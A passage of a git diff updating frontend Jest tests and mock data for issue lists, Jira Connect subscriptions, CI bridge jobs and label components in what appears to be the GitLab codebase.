localVue.use(VueApollo); + Vue.use(VueApollo); const defaultProvide = { calendarPath: 'calendar/path', @@ -69,6 +69,7 @@ describe('IssuesListApp component', () => { hasAnyIssues: true, hasAnyProjects: true, hasBlockedIssuesFeature: true, + hasIssuableHealthStatusFeature: true, hasIssueWeightsFeature: true, hasIterationsFeature: true, isProject: true, @@ -111,7 +112,6 @@ describe('IssuesListApp component', () => { const apolloProvider = createMockApollo(requestHandlers); return mountFn(IssuesListApp, { - localVue, apolloProvider, provide: { ...defaultProvide, @@ -314,6 +314,29 @@ describe('IssuesListApp component', () => { }, }); }); + + describe('when issue repositioning is disabled and the sort is manual', () => { + beforeEach(() => { + setWindowLocation(`?sort=${RELATIVE_POSITION}`); + wrapper = mountComponent({ provide: { isIssueRepositioningDisabled: true } }); + }); + + it('changes the sort to the default of created descending', () => { + expect(findIssuableList().props()).toMatchObject({ + initialSortBy: CREATED_DESC, + urlParams: { + sort: urlSortParams[CREATED_DESC], + }, + }); + }); + + it('shows an alert to tell the user that manual reordering is disabled', () => { + expect(createFlash).toHaveBeenCalledWith({ + message: IssuesListApp.i18n.issueRepositioningMessage, + type: FLASH_TYPES.NOTICE, + }); + }); + }); }); describe('state', () => { @@ -336,6 +359,27 @@ describe('IssuesListApp component', () => { expect(findIssuableList().props('initialFilterValue')).toEqual(filteredTokens); }); + + describe('when anonymous searching is performed', () => { + beforeEach(() => { + setWindowLocation(locationSearch); + + wrapper = mountComponent({ + provide: { isAnonymousSearchDisabled: true, isSignedIn: false }, + }); + }); + + it('is not set from url params', () => { + expect(findIssuableList().props('initialFilterValue')).toEqual([]); + }); + + it('shows an alert to tell the user they must be signed in to search', () => { + expect(createFlash).toHaveBeenCalledWith({ 
+ message: IssuesListApp.i18n.anonymousSearchingMessage, + type: FLASH_TYPES.NOTICE, + }); + }); + }); }); }); @@ -484,11 +528,7 @@ describe('IssuesListApp component', () => { describe('when user is signed out', () => { beforeEach(() => { - wrapper = mountComponent({ - provide: { - isSignedIn: false, - }, - }); + wrapper = mountComponent({ provide: { isSignedIn: false } }); }); it('does not render My-Reaction or Confidential tokens', () => { @@ -501,54 +541,6 @@ describe('IssuesListApp component', () => { }); }); - describe('when iterations are not available', () => { - beforeEach(() => { - wrapper = mountComponent({ - provide: { - projectIterationsPath: '', - }, - }); - }); - - it('does not render Iteration token', () => { - expect(findIssuableList().props('searchTokens')).not.toMatchObject([ - { type: TOKEN_TYPE_ITERATION }, - ]); - }); - }); - - describe('when epics are not available', () => { - beforeEach(() => { - wrapper = mountComponent({ - provide: { - groupPath: '', - }, - }); - }); - - it('does not render Epic token', () => { - expect(findIssuableList().props('searchTokens')).not.toMatchObject([ - { type: TOKEN_TYPE_EPIC }, - ]); - }); - }); - - describe('when weights are not available', () => { - beforeEach(() => { - wrapper = mountComponent({ - provide: { - groupPath: '', - }, - }); - }); - - it('does not render Weight token', () => { - expect(findIssuableList().props('searchTokens')).not.toMatchObject([ - { type: TOKEN_TYPE_WEIGHT }, - ]); - }); - }); - describe('when all tokens are available', () => { const originalGon = window.gon; @@ -561,33 +553,27 @@ describe('IssuesListApp component', () => { current_user_avatar_url: mockCurrentUser.avatar_url, }; - wrapper = mountComponent({ - provide: { - isSignedIn: true, - projectIterationsPath: 'project/iterations/path', - groupPath: 'group/path', - hasIssueWeightsFeature: true, - }, - }); + wrapper = mountComponent({ provide: { isSignedIn: true } }); }); - it('renders all tokens', () => { + afterEach(() => 
{ + window.gon = originalGon; + }); + + it('renders all tokens alphabetically', () => { const preloadedAuthors = [ { ...mockCurrentUser, id: convertToGraphQLId('User', mockCurrentUser.id) }, ]; expect(findIssuableList().props('searchTokens')).toMatchObject([ - { type: TOKEN_TYPE_AUTHOR, preloadedAuthors }, { type: TOKEN_TYPE_ASSIGNEE, preloadedAuthors }, - { type: TOKEN_TYPE_MILESTONE }, + { type: TOKEN_TYPE_AUTHOR, preloadedAuthors }, + { type: TOKEN_TYPE_CONFIDENTIAL }, { type: TOKEN_TYPE_LABEL }, - { type: TOKEN_TYPE_TYPE }, - { type: TOKEN_TYPE_RELEASE }, + { type: TOKEN_TYPE_MILESTONE }, { type: TOKEN_TYPE_MY_REACTION }, - { type: TOKEN_TYPE_CONFIDENTIAL }, - { type: TOKEN_TYPE_ITERATION }, - { type: TOKEN_TYPE_EPIC }, - { type: TOKEN_TYPE_WEIGHT }, + { type: TOKEN_TYPE_RELEASE }, + { type: TOKEN_TYPE_TYPE }, ]); }); }); @@ -607,13 +593,18 @@ describe('IssuesListApp component', () => { }); it('shows an error message', () => { - expect(createFlash).toHaveBeenCalledWith({ - captureError: true, - error: new Error('Network error: ERROR'), - message, - }); + expect(findIssuableList().props('error')).toBe(message); + expect(Sentry.captureException).toHaveBeenCalledWith(new Error('Network error: ERROR')); }); }); + + it('clears error message when "dismiss-alert" event is emitted from IssuableList', () => { + wrapper = mountComponent({ issuesQueryResponse: jest.fn().mockRejectedValue(new Error()) }); + + findIssuableList().vm.$emit('dismiss-alert'); + + expect(findIssuableList().props('error')).toBeNull(); + }); }); describe('events', () => { @@ -676,6 +667,7 @@ describe('IssuesListApp component', () => { const response = (isProject = true) => ({ data: { [isProject ? 
'project' : 'group']: { + id: '1', issues: { ...defaultQueryResponse.data.project.issues, nodes: [issueOne, issueTwo, issueThree, issueFour], @@ -737,11 +729,10 @@ describe('IssuesListApp component', () => { await waitForPromises(); - expect(createFlash).toHaveBeenCalledWith({ - message: IssuesListApp.i18n.reorderError, - captureError: true, - error: new Error('Request failed with status code 500'), - }); + expect(findIssuableList().props('error')).toBe(IssuesListApp.i18n.reorderError); + expect(Sentry.captureException).toHaveBeenCalledWith( + new Error('Request failed with status code 500'), + ); }); }); }); @@ -762,6 +753,30 @@ describe('IssuesListApp component', () => { }); }, ); + + describe('when issue repositioning is disabled', () => { + const initialSort = CREATED_DESC; + + beforeEach(() => { + setWindowLocation(`?sort=${initialSort}`); + wrapper = mountComponent({ provide: { isIssueRepositioningDisabled: true } }); + + findIssuableList().vm.$emit('sort', RELATIVE_POSITION_ASC); + }); + + it('does not update the sort to manual', () => { + expect(findIssuableList().props('urlParams')).toMatchObject({ + sort: urlSortParams[initialSort], + }); + }); + + it('shows an alert to tell the user that manual reordering is disabled', () => { + expect(createFlash).toHaveBeenCalledWith({ + message: IssuesListApp.i18n.issueRepositioningMessage, + type: FLASH_TYPES.NOTICE, + }); + }); + }); }); describe('when "update-legacy-bulk-edit" event is emitted by IssuableList', () => { @@ -778,15 +793,37 @@ describe('IssuesListApp component', () => { }); describe('when "filter" event is emitted by IssuableList', () => { - beforeEach(() => { + it('updates IssuableList with url params', async () => { wrapper = mountComponent(); findIssuableList().vm.$emit('filter', filteredTokens); - }); + await nextTick(); - it('updates IssuableList with url params', () => { expect(findIssuableList().props('urlParams')).toMatchObject(urlParams); }); + + describe('when anonymous searching is 
performed', () => { + beforeEach(() => { + wrapper = mountComponent({ + provide: { isAnonymousSearchDisabled: true, isSignedIn: false }, + }); + + findIssuableList().vm.$emit('filter', filteredTokens); + }); + + it('does not update IssuableList with url params ', async () => { + const defaultParams = { sort: 'created_date', state: 'opened' }; + + expect(findIssuableList().props('urlParams')).toEqual(defaultParams); + }); + + it('shows an alert to tell the user they must be signed in to search', () => { + expect(createFlash).toHaveBeenCalledWith({ + message: IssuesListApp.i18n.anonymousSearchingMessage, + type: FLASH_TYPES.NOTICE, + }); + }); + }); }); }); }); diff --git a/spec/frontend/issues_list/mock_data.js b/spec/frontend/issues_list/mock_data.js index 19a8af4d9c2..948699876ce 100644 --- a/spec/frontend/issues_list/mock_data.js +++ b/spec/frontend/issues_list/mock_data.js @@ -6,6 +6,7 @@ import { export const getIssuesQueryResponse = { data: { project: { + id: '1', issues: { pageInfo: { hasNextPage: true, @@ -22,6 +23,7 @@ export const getIssuesQueryResponse = { createdAt: '2021-05-22T04:08:01Z', downvotes: 2, dueDate: '2021-05-29', + hidden: false, humanTimeEstimate: null, mergeRequestsCount: false, moved: false, @@ -74,6 +76,7 @@ export const getIssuesQueryResponse = { export const getIssuesCountsQueryResponse = { data: { project: { + id: '1', openedIssues: { count: 1, }, @@ -287,6 +290,7 @@ export const project3 = { export const searchProjectsQueryResponse = { data: { group: { + id: '1', projects: { nodes: [project1, project2, project3], }, @@ -297,6 +301,7 @@ export const searchProjectsQueryResponse = { export const emptySearchProjectsQueryResponse = { data: { group: { + id: '1', projects: { nodes: [], }, diff --git a/spec/frontend/jira_connect/subscriptions/components/app_spec.js b/spec/frontend/jira_connect/subscriptions/components/app_spec.js index 8e464968453..47fe96262ee 100644 --- a/spec/frontend/jira_connect/subscriptions/components/app_spec.js +++ 
b/spec/frontend/jira_connect/subscriptions/components/app_spec.js @@ -5,6 +5,7 @@ import JiraConnectApp from '~/jira_connect/subscriptions/components/app.vue'; import AddNamespaceButton from '~/jira_connect/subscriptions/components/add_namespace_button.vue'; import SignInButton from '~/jira_connect/subscriptions/components/sign_in_button.vue'; import SubscriptionsList from '~/jira_connect/subscriptions/components/subscriptions_list.vue'; +import UserLink from '~/jira_connect/subscriptions/components/user_link.vue'; import createStore from '~/jira_connect/subscriptions/store'; import { SET_ALERT } from '~/jira_connect/subscriptions/store/mutation_types'; import { __ } from '~/locale'; @@ -12,6 +13,7 @@ import { mockSubscription } from '../mock_data'; jest.mock('~/jira_connect/subscriptions/utils', () => ({ retrieveAlert: jest.fn().mockReturnValue({ message: 'error message' }), + getGitlabSignInURL: jest.fn(), })); describe('JiraConnectApp', () => { @@ -83,6 +85,22 @@ describe('JiraConnectApp', () => { }); }, ); + + it('renders UserLink component', () => { + createComponent({ + provide: { + usersPath: '/user', + subscriptions: [], + }, + }); + + const userLink = wrapper.findComponent(UserLink); + expect(userLink.exists()).toBe(true); + expect(userLink.props()).toEqual({ + hasSubscriptions: false, + userSignedIn: false, + }); + }); }); describe('alert', () => { diff --git a/spec/frontend/jira_connect/subscriptions/components/user_link_spec.js b/spec/frontend/jira_connect/subscriptions/components/user_link_spec.js new file mode 100644 index 00000000000..b98a36269a3 --- /dev/null +++ b/spec/frontend/jira_connect/subscriptions/components/user_link_spec.js @@ -0,0 +1,91 @@ +import { GlSprintf } from '@gitlab/ui'; +import UserLink from '~/jira_connect/subscriptions/components/user_link.vue'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import waitForPromises from 'helpers/wait_for_promises'; + +jest.mock('~/jira_connect/subscriptions/utils', () 
=> ({ + getGitlabSignInURL: jest.fn().mockImplementation((path) => Promise.resolve(path)), +})); + +describe('SubscriptionsList', () => { + let wrapper; + + const createComponent = (propsData = {}, { provide } = {}) => { + wrapper = shallowMountExtended(UserLink, { + propsData, + provide, + stubs: { + GlSprintf, + }, + }); + }; + + const findSignInLink = () => wrapper.findByTestId('sign-in-link'); + const findGitlabUserLink = () => wrapper.findByTestId('gitlab-user-link'); + const findSprintf = () => wrapper.findComponent(GlSprintf); + + afterEach(() => { + wrapper.destroy(); + }); + + describe.each` + userSignedIn | hasSubscriptions | expectGlSprintf | expectGlLink + ${true} | ${false} | ${true} | ${false} + ${false} | ${true} | ${false} | ${true} + ${true} | ${true} | ${true} | ${false} + ${false} | ${false} | ${false} | ${false} + `( + 'when `userSignedIn` is $userSignedIn and `hasSubscriptions` is $hasSubscriptions', + ({ userSignedIn, hasSubscriptions, expectGlSprintf, expectGlLink }) => { + it('renders template correctly', () => { + createComponent({ + userSignedIn, + hasSubscriptions, + }); + + expect(findSprintf().exists()).toBe(expectGlSprintf); + expect(findSignInLink().exists()).toBe(expectGlLink); + }); + }, + ); + + describe('sign in link', () => { + it('renders with correct href', async () => { + const mockUsersPath = '/user'; + createComponent( + { + userSignedIn: false, + hasSubscriptions: true, + }, + { provide: { usersPath: mockUsersPath } }, + ); + + await waitForPromises(); + + expect(findSignInLink().exists()).toBe(true); + expect(findSignInLink().attributes('href')).toBe(mockUsersPath); + }); + }); + + describe('gitlab user link', () => { + window.gon = { current_username: 'root' }; + + beforeEach(() => { + createComponent( + { + userSignedIn: true, + hasSubscriptions: true, + }, + { provide: { gitlabUserPath: '/root' } }, + ); + }); + + it('renders with correct href', () => { + expect(findGitlabUserLink().attributes('href')).toBe('/root'); + 
}); + + it('contains GitLab user handle', () => { + expect(findGitlabUserLink().text()).toBe('@root'); + }); + }); +}); diff --git a/spec/frontend/jira_connect/subscriptions/index_spec.js b/spec/frontend/jira_connect/subscriptions/index_spec.js deleted file mode 100644 index b97918a198e..00000000000 --- a/spec/frontend/jira_connect/subscriptions/index_spec.js +++ /dev/null @@ -1,36 +0,0 @@ -import { initJiraConnect } from '~/jira_connect/subscriptions'; -import { getGitlabSignInURL } from '~/jira_connect/subscriptions/utils'; - -jest.mock('~/jira_connect/subscriptions/utils'); - -describe('initJiraConnect', () => { - const mockInitialHref = 'https://gitlab.com'; - - beforeEach(() => { - setFixtures(` - <a class="js-jira-connect-sign-in" href="${mockInitialHref}">Sign In</a> - <a class="js-jira-connect-sign-in" href="${mockInitialHref}">Another Sign In</a> - `); - }); - - const assertSignInLinks = (expectedLink) => { - Array.from(document.querySelectorAll('.js-jira-connect-sign-in')).forEach((el) => { - expect(el.getAttribute('href')).toBe(expectedLink); - }); - }; - - describe('Sign in links', () => { - it('are updated on initialization', async () => { - const mockSignInLink = `https://gitlab.com?return_to=${encodeURIComponent('/test/location')}`; - getGitlabSignInURL.mockResolvedValue(mockSignInLink); - - // assert the initial state - assertSignInLinks(mockInitialHref); - - await initJiraConnect(); - - // assert the update has occurred - assertSignInLinks(mockSignInLink); - }); - }); -}); diff --git a/spec/frontend/jira_import/components/__snapshots__/jira_import_form_spec.js.snap b/spec/frontend/jira_import/components/__snapshots__/jira_import_form_spec.js.snap index 9f5b772a5c7..a72528ae36b 100644 --- a/spec/frontend/jira_import/components/__snapshots__/jira_import_form_spec.js.snap +++ b/spec/frontend/jira_import/components/__snapshots__/jira_import_form_spec.js.snap @@ -152,7 +152,7 @@ exports[`JiraImportForm table body shows correct information in each cell 
1`] = aria-label="Search" class="gl-form-input gl-search-box-by-type-input form-control" placeholder="Search" - type="text" + type="search" /> <div @@ -283,7 +283,7 @@ exports[`JiraImportForm table body shows correct information in each cell 1`] = aria-label="Search" class="gl-form-input gl-search-box-by-type-input form-control" placeholder="Search" - type="text" + type="search" /> <div diff --git a/spec/frontend/jobs/bridge/app_spec.js b/spec/frontend/jobs/bridge/app_spec.js new file mode 100644 index 00000000000..0e232ab240d --- /dev/null +++ b/spec/frontend/jobs/bridge/app_spec.js @@ -0,0 +1,33 @@ +import { shallowMount } from '@vue/test-utils'; +import BridgeApp from '~/jobs/bridge/app.vue'; +import BridgeEmptyState from '~/jobs/bridge/components/empty_state.vue'; +import BridgeSidebar from '~/jobs/bridge/components/sidebar.vue'; + +describe('Bridge Show Page', () => { + let wrapper; + + const createComponent = () => { + wrapper = shallowMount(BridgeApp, {}); + }; + + const findEmptyState = () => wrapper.findComponent(BridgeEmptyState); + const findSidebar = () => wrapper.findComponent(BridgeSidebar); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('template', () => { + beforeEach(() => { + createComponent(); + }); + + it('renders empty state', () => { + expect(findEmptyState().exists()).toBe(true); + }); + + it('renders sidebar', () => { + expect(findSidebar().exists()).toBe(true); + }); + }); +}); diff --git a/spec/frontend/jobs/bridge/components/empty_state_spec.js b/spec/frontend/jobs/bridge/components/empty_state_spec.js new file mode 100644 index 00000000000..83642450118 --- /dev/null +++ b/spec/frontend/jobs/bridge/components/empty_state_spec.js @@ -0,0 +1,59 @@ +import { GlButton } from '@gitlab/ui'; +import { shallowMount } from '@vue/test-utils'; +import BridgeEmptyState from '~/jobs/bridge/components/empty_state.vue'; +import { MOCK_EMPTY_ILLUSTRATION_PATH, MOCK_PATH_TO_DOWNSTREAM } from '../mock_data'; + +describe('Bridge Empty State', 
() => { + let wrapper; + + const createComponent = (props) => { + wrapper = shallowMount(BridgeEmptyState, { + provide: { + emptyStateIllustrationPath: MOCK_EMPTY_ILLUSTRATION_PATH, + }, + propsData: { + downstreamPipelinePath: MOCK_PATH_TO_DOWNSTREAM, + ...props, + }, + }); + }; + + const findSvg = () => wrapper.find('img'); + const findTitle = () => wrapper.find('h1'); + const findLinkBtn = () => wrapper.findComponent(GlButton); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('template', () => { + beforeEach(() => { + createComponent(); + }); + + it('renders illustration', () => { + expect(findSvg().exists()).toBe(true); + }); + + it('renders title', () => { + expect(findTitle().exists()).toBe(true); + expect(findTitle().text()).toBe(wrapper.vm.$options.i18n.title); + }); + + it('renders CTA button', () => { + expect(findLinkBtn().exists()).toBe(true); + expect(findLinkBtn().text()).toBe(wrapper.vm.$options.i18n.linkBtnText); + expect(findLinkBtn().attributes('href')).toBe(MOCK_PATH_TO_DOWNSTREAM); + }); + }); + + describe('without downstream pipeline', () => { + beforeEach(() => { + createComponent({ downstreamPipelinePath: undefined }); + }); + + it('does not render CTA button', () => { + expect(findLinkBtn().exists()).toBe(false); + }); + }); +}); diff --git a/spec/frontend/jobs/bridge/components/sidebar_spec.js b/spec/frontend/jobs/bridge/components/sidebar_spec.js new file mode 100644 index 00000000000..ba4018753af --- /dev/null +++ b/spec/frontend/jobs/bridge/components/sidebar_spec.js @@ -0,0 +1,76 @@ +import { GlButton, GlDropdown } from '@gitlab/ui'; +import { GlBreakpointInstance } from '@gitlab/ui/dist/utils'; +import { nextTick } from 'vue'; +import { shallowMount } from '@vue/test-utils'; +import BridgeSidebar from '~/jobs/bridge/components/sidebar.vue'; +import { BUILD_NAME } from '../mock_data'; + +describe('Bridge Sidebar', () => { + let wrapper; + + const createComponent = () => { + wrapper = shallowMount(BridgeSidebar, { + provide: 
{ + buildName: BUILD_NAME, + }, + }); + }; + + const findSidebar = () => wrapper.find('aside'); + const findRetryDropdown = () => wrapper.find(GlDropdown); + const findToggle = () => wrapper.find(GlButton); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('template', () => { + beforeEach(() => { + createComponent(); + }); + + it('renders retry dropdown', () => { + expect(findRetryDropdown().exists()).toBe(true); + }); + }); + + describe('sidebar expansion', () => { + beforeEach(() => { + createComponent(); + }); + + it('toggles expansion on button click', async () => { + expect(findSidebar().classes()).not.toContain('gl-display-none'); + + findToggle().vm.$emit('click'); + await nextTick(); + + expect(findSidebar().classes()).toContain('gl-display-none'); + }); + + describe('on resize', () => { + it.each` + breakpoint | isSidebarExpanded + ${'xs'} | ${false} + ${'sm'} | ${false} + ${'md'} | ${true} + ${'lg'} | ${true} + ${'xl'} | ${true} + `( + 'sets isSidebarExpanded to `$isSidebarExpanded` when the breakpoint is "$breakpoint"', + async ({ breakpoint, isSidebarExpanded }) => { + jest.spyOn(GlBreakpointInstance, 'getBreakpointSize').mockReturnValue(breakpoint); + + window.dispatchEvent(new Event('resize')); + await nextTick(); + + if (isSidebarExpanded) { + expect(findSidebar().classes()).not.toContain('gl-display-none'); + } else { + expect(findSidebar().classes()).toContain('gl-display-none'); + } + }, + ); + }); + }); +}); diff --git a/spec/frontend/jobs/bridge/mock_data.js b/spec/frontend/jobs/bridge/mock_data.js new file mode 100644 index 00000000000..146d1a062ac --- /dev/null +++ b/spec/frontend/jobs/bridge/mock_data.js @@ -0,0 +1,3 @@ +export const MOCK_EMPTY_ILLUSTRATION_PATH = '/path/to/svg'; +export const MOCK_PATH_TO_DOWNSTREAM = '/path/to/downstream/pipeline'; +export const BUILD_NAME = 'Child Pipeline Trigger'; diff --git a/spec/frontend/jobs/components/job_sidebar_details_container_spec.js 
b/spec/frontend/jobs/components/job_sidebar_details_container_spec.js index ad0368555fa..cc9a5e4ee25 100644 --- a/spec/frontend/jobs/components/job_sidebar_details_container_spec.js +++ b/spec/frontend/jobs/components/job_sidebar_details_container_spec.js @@ -56,7 +56,7 @@ describe('Job Sidebar Details Container', () => { beforeEach(createWrapper); it.each([ - ['duration', 'Duration: 6 seconds'], + ['duration', 'Elapsed time: 6 seconds'], ['erased_at', 'Erased: 3 weeks ago'], ['finished_at', 'Finished: 3 weeks ago'], ['queued', 'Queued: 9 seconds'], @@ -86,6 +86,15 @@ describe('Job Sidebar Details Container', () => { expect(findAllDetailsRow()).toHaveLength(7); }); + + describe('duration row', () => { + it('renders all the details components', async () => { + createWrapper(); + await store.dispatch('receiveJobSuccess', job); + + expect(findAllDetailsRow().at(0).text()).toBe('Duration: 6 seconds'); + }); + }); }); describe('timeout', () => { diff --git a/spec/frontend/jobs/components/table/cells/actions_cell_spec.js b/spec/frontend/jobs/components/table/cells/actions_cell_spec.js index 1b1e2d4df8f..6caf36e1461 100644 --- a/spec/frontend/jobs/components/table/cells/actions_cell_spec.js +++ b/spec/frontend/jobs/components/table/cells/actions_cell_spec.js @@ -5,7 +5,14 @@ import ActionsCell from '~/jobs/components/table/cells/actions_cell.vue'; import JobPlayMutation from '~/jobs/components/table/graphql/mutations/job_play.mutation.graphql'; import JobRetryMutation from '~/jobs/components/table/graphql/mutations/job_retry.mutation.graphql'; import JobUnscheduleMutation from '~/jobs/components/table/graphql/mutations/job_unschedule.mutation.graphql'; -import { playableJob, retryableJob, scheduledJob } from '../../../mock_data'; +import { + playableJob, + retryableJob, + scheduledJob, + cannotRetryJob, + cannotPlayJob, + cannotPlayScheduledJob, +} from '../../../mock_data'; describe('Job actions cell', () => { let wrapper; @@ -51,6 +58,14 @@ describe('Job actions cell', 
() => { wrapper.destroy(); }); + it('displays the artifacts download button with correct link', () => { + createComponent(playableJob); + + expect(findDownloadArtifactsButton().attributes('href')).toBe( + playableJob.artifacts.nodes[0].downloadPath, + ); + }); + it('does not display an artifacts download button', () => { createComponent(retryableJob); @@ -58,6 +73,17 @@ describe('Job actions cell', () => { }); it.each` + button | action | jobType + ${findPlayButton} | ${'play'} | ${cannotPlayJob} + ${findRetryButton} | ${'retry'} | ${cannotRetryJob} + ${findPlayScheduledJobButton} | ${'play scheduled'} | ${cannotPlayScheduledJob} + `('does not display the $action button if user cannot update build', ({ button, jobType }) => { + createComponent(jobType); + + expect(button().exists()).toBe(false); + }); + + it.each` button | action | jobType ${findPlayButton} | ${'play'} | ${playableJob} ${findRetryButton} | ${'retry'} | ${retryableJob} diff --git a/spec/frontend/jobs/mock_data.js b/spec/frontend/jobs/mock_data.js index 43755b46bc9..45d297ba364 100644 --- a/spec/frontend/jobs/mock_data.js +++ b/spec/frontend/jobs/mock_data.js @@ -1474,6 +1474,7 @@ export const mockJobsInTable = [ export const mockJobsQueryResponse = { data: { project: { + id: '1', jobs: { pageInfo: { endCursor: 'eyJpZCI6IjIzMTcifQ', @@ -1488,15 +1489,18 @@ export const mockJobsQueryResponse = { nodes: [ { downloadPath: '/root/ci-project/-/jobs/2336/artifacts/download?file_type=trace', + fileType: 'TRACE', __typename: 'CiJobArtifact', }, { downloadPath: '/root/ci-project/-/jobs/2336/artifacts/download?file_type=metadata', + fileType: 'METADATA', __typename: 'CiJobArtifact', }, { downloadPath: '/root/ci-project/-/jobs/2336/artifacts/download?file_type=archive', + fileType: 'ARCHIVE', __typename: 'CiJobArtifact', }, ], @@ -1509,6 +1513,7 @@ export const mockJobsQueryResponse = { triggered: null, createdByTag: false, detailedStatus: { + id: 'status-1', detailsPath: '/root/ci-project/-/jobs/2336', group: 
'success', icon: 'status_success', @@ -1516,6 +1521,7 @@ export const mockJobsQueryResponse = { text: 'passed', tooltip: 'passed', action: { + id: 'action-1', buttonTitle: 'Retry this job', icon: 'retry', method: 'post', @@ -1535,6 +1541,7 @@ export const mockJobsQueryResponse = { id: 'gid://gitlab/Ci::Pipeline/473', path: '/root/ci-project/-/pipelines/473', user: { + id: 'user-1', webPath: '/root', avatarUrl: 'https://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=80&d=identicon', @@ -1543,6 +1550,7 @@ export const mockJobsQueryResponse = { __typename: 'Pipeline', }, stage: { + id: 'stage-1', name: 'deploy', __typename: 'CiStage', }, @@ -1558,6 +1566,7 @@ export const mockJobsQueryResponse = { userPermissions: { readBuild: true, readJobArtifacts: true, + updateBuild: true, __typename: 'JobPermissions', }, __typename: 'CiJob', @@ -1573,13 +1582,23 @@ export const mockJobsQueryResponse = { export const mockJobsQueryEmptyResponse = { data: { project: { + id: '1', jobs: [], }, }, }; export const retryableJob = { - artifacts: { nodes: [], __typename: 'CiJobArtifactConnection' }, + artifacts: { + nodes: [ + { + downloadPath: '/root/ci-project/-/jobs/847/artifacts/download?file_type=trace', + fileType: 'TRACE', + __typename: 'CiJobArtifact', + }, + ], + __typename: 'CiJobArtifactConnection', + }, allowFailure: false, status: 'SUCCESS', scheduledAt: null, @@ -1630,15 +1649,31 @@ export const retryableJob = { cancelable: false, active: false, stuck: false, - userPermissions: { readBuild: true, __typename: 'JobPermissions' }, + userPermissions: { readBuild: true, updateBuild: true, __typename: 'JobPermissions' }, __typename: 'CiJob', }; +export const cannotRetryJob = { + ...retryableJob, + userPermissions: { readBuild: true, updateBuild: false, __typename: 'JobPermissions' }, +}; + export const playableJob = { artifacts: { nodes: [ { - downloadPath: '/root/test-job-artifacts/-/jobs/1982/artifacts/download?file_type=trace', + downloadPath: 
'/root/ci-project/-/jobs/621/artifacts/download?file_type=archive', + fileType: 'ARCHIVE', + __typename: 'CiJobArtifact', + }, + { + downloadPath: '/root/ci-project/-/jobs/621/artifacts/download?file_type=metadata', + fileType: 'METADATA', + __typename: 'CiJobArtifact', + }, + { + downloadPath: '/root/ci-project/-/jobs/621/artifacts/download?file_type=trace', + fileType: 'TRACE', __typename: 'CiJobArtifact', }, ], @@ -1694,10 +1729,25 @@ export const playableJob = { cancelable: false, active: false, stuck: false, - userPermissions: { readBuild: true, readJobArtifacts: true, __typename: 'JobPermissions' }, + userPermissions: { + readBuild: true, + readJobArtifacts: true, + updateBuild: true, + __typename: 'JobPermissions', + }, __typename: 'CiJob', }; +export const cannotPlayJob = { + ...playableJob, + userPermissions: { + readBuild: true, + readJobArtifacts: true, + updateBuild: false, + __typename: 'JobPermissions', + }, +}; + export const scheduledJob = { artifacts: { nodes: [], __typename: 'CiJobArtifactConnection' }, allowFailure: false, @@ -1750,6 +1800,16 @@ export const scheduledJob = { cancelable: false, active: false, stuck: false, - userPermissions: { readBuild: true, __typename: 'JobPermissions' }, + userPermissions: { readBuild: true, updateBuild: true, __typename: 'JobPermissions' }, __typename: 'CiJob', }; + +export const cannotPlayScheduledJob = { + ...scheduledJob, + userPermissions: { + readBuild: true, + readJobArtifacts: true, + updateBuild: false, + __typename: 'JobPermissions', + }, +}; diff --git a/spec/frontend/vue_shared/components/delete_label_modal_spec.js b/spec/frontend/labels/components/delete_label_modal_spec.js index 3905690dab4..6204138f885 100644 --- a/spec/frontend/vue_shared/components/delete_label_modal_spec.js +++ b/spec/frontend/labels/components/delete_label_modal_spec.js @@ -3,7 +3,7 @@ import { mount } from '@vue/test-utils'; import { stubComponent } from 'helpers/stub_component'; import { TEST_HOST } from 
'helpers/test_constants'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; -import DeleteLabelModal from '~/vue_shared/components/delete_label_modal.vue'; +import DeleteLabelModal from '~/labels/components/delete_label_modal.vue'; const MOCK_MODAL_DATA = { labelName: 'label 1', @@ -11,7 +11,7 @@ const MOCK_MODAL_DATA = { destroyPath: `${TEST_HOST}/1`, }; -describe('vue_shared/components/delete_label_modal', () => { +describe('~/labels/components/delete_label_modal', () => { let wrapper; const createComponent = () => { diff --git a/spec/frontend/pages/labels/components/promote_label_modal_spec.js b/spec/frontend/labels/components/promote_label_modal_spec.js index 4d5d1f98b59..d2fbdfc9a8d 100644 --- a/spec/frontend/pages/labels/components/promote_label_modal_spec.js +++ b/spec/frontend/labels/components/promote_label_modal_spec.js @@ -2,8 +2,8 @@ import Vue from 'vue'; import { TEST_HOST } from 'helpers/test_constants'; import mountComponent from 'helpers/vue_mount_component_helper'; import axios from '~/lib/utils/axios_utils'; -import promoteLabelModal from '~/pages/projects/labels/components/promote_label_modal.vue'; -import eventHub from '~/pages/projects/labels/event_hub'; +import promoteLabelModal from '~/labels/components/promote_label_modal.vue'; +import eventHub from '~/labels/event_hub'; describe('Promote label modal', () => { let vm; diff --git a/spec/frontend/delete_label_modal_spec.js b/spec/frontend/labels/delete_label_modal_spec.js index 0b3e6fe652a..c1e6ce87990 100644 --- a/spec/frontend/delete_label_modal_spec.js +++ b/spec/frontend/labels/delete_label_modal_spec.js @@ -1,5 +1,5 @@ import { TEST_HOST } from 'helpers/test_constants'; -import initDeleteLabelModal from '~/delete_label_modal'; +import { initDeleteLabelModal } from '~/labels'; describe('DeleteLabelModal', () => { const buttons = [ diff --git a/spec/frontend/labels_select_spec.js b/spec/frontend/labels/labels_select_spec.js index cbc9a923f8b..f6e280564cc 100644 --- 
a/spec/frontend/labels_select_spec.js +++ b/spec/frontend/labels/labels_select_spec.js @@ -1,5 +1,5 @@ import $ from 'jquery'; -import LabelsSelect from '~/labels_select'; +import LabelsSelect from '~/labels/labels_select'; const mockUrl = '/foo/bar/url'; diff --git a/spec/frontend/lib/utils/common_utils_spec.js b/spec/frontend/lib/utils/common_utils_spec.js index de1be5bc337..3e2ba918d9b 100644 --- a/spec/frontend/lib/utils/common_utils_spec.js +++ b/spec/frontend/lib/utils/common_utils_spec.js @@ -1040,4 +1040,15 @@ describe('common_utils', () => { expect(result).toEqual(['hello', 'helloWorld']); }); }); + + describe('convertArrayOfObjectsToCamelCase', () => { + it('returns a new array with snake_case object property names converted camelCase', () => { + const result = commonUtils.convertArrayOfObjectsToCamelCase([ + { hello: '' }, + { hello_world: '' }, + ]); + + expect(result).toEqual([{ hello: '' }, { helloWorld: '' }]); + }); + }); }); diff --git a/spec/frontend/lib/utils/dom_utils_spec.js 